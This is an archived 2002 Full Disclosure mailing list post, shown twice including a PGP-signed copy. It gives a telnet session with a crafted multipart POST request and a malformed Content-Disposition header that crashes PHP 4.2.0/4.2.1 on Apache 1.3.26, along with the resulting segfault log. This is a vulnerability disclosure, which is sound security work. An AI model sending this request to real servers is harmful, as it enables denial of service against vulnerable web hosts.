Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

How to reproduce PHP segfault.
From: full-disclosure () lists netsys com (Joseph S. Testa II)
Date: Wed, 24 Jul 2002 10:28:49 -0400

This is a multi-part message in MIME format.
--------------020401060206020303010101
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=us-ascii; format=flowed



Happy Wednesday.

     The following is an example on how to reproduce the segmentation violation
in PHP 4.2.0 & PHP 4.2.1 with Apache 1.3.26 on Linux x86:


[jdog () wonderland logs]$ telnet 192.168.x.x 80
Trying 192.168.x.x...
Connected to 192.168.x.x.
Escape character is '^]'.
POST /chad_owns_me.php HTTP/1.0
Content-type: multipart/form-data; boundary=---------------------------123
Content-length: 129

-----------------------------123
Content-Disposition: filename

http://www.rapid7.com/
-----------------------------123--

Connection closed by foreign host.
[jdog () wonderland logs]$ cat error_log
[Tue Jul 23 11:11:52 2002] [notice] child pid 8948 exit signal Segmentation 
fault (11)
[jdog () wonderland logs]$


     Note that a path to an existing PHP file must be used, otherwise the PHP
interpreter will not be invoked.


     - Joe


GPG key:  http://www.cs.rit.edu/~jst3290/joetesta_r7.pub
A22B 2683 C40E 5443 AE52  AD6D 65B2 F5DF 4B11 06B4


--------------020401060206020303010101
Content-Transfer-Encoding: 7bit
Content-Type: text/plain;
 name="php.asc"
Content-Disposition: inline;
 filename="php.asc"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



Happy Wednesday.

    The following is an example on how to reproduce the segmentation violation
in PHP 4.2.0 & PHP 4.2.1 with Apache 1.3.26 on Linux x86:


[jdog () wonderland logs]$ telnet 192.168.x.x 80
Trying 192.168.x.x...
Connected to 192.168.x.x.
Escape character is '^]'.
POST /chad_owns_me.php HTTP/1.0
Content-type: multipart/form-data; boundary=---------------------------123
Content-length: 129

- -----------------------------123
Content-Disposition: filename

http://www.rapid7.com/
- -----------------------------123--

Connection closed by foreign host.
[jdog () wonderland logs]$ cat error_log 
[Tue Jul 23 11:11:52 2002] [notice] child pid 8948 exit signal Segmentation fault (11)
[jdog () wonderland logs]$ 


    Note that a path to an existing PHP file must be used, otherwise the PHP
interpreter will not be invoked.


    - Joe


GPG key:  http://www.cs.rit.edu/~jst3290/joetesta_r7.pub
A22B 2683 C40E 5443 AE52  AD6D 65B2 F5DF 4B11 06B4

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE9PptSZbL130sRBrQRAsSAAJ4+FbEbPXqy5VKUcRDzeO1NzcY/1gCdH3MM
oRkBUnspQkZ3JARKDTL5Oe8=
=KzKt
-----END PGP SIGNATURE-----

--------------020401060206020303010101--



  By Date           By Thread  

Current thread:
  • How to reproduce PHP segfault. Joseph S. Testa II (Jul 24)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]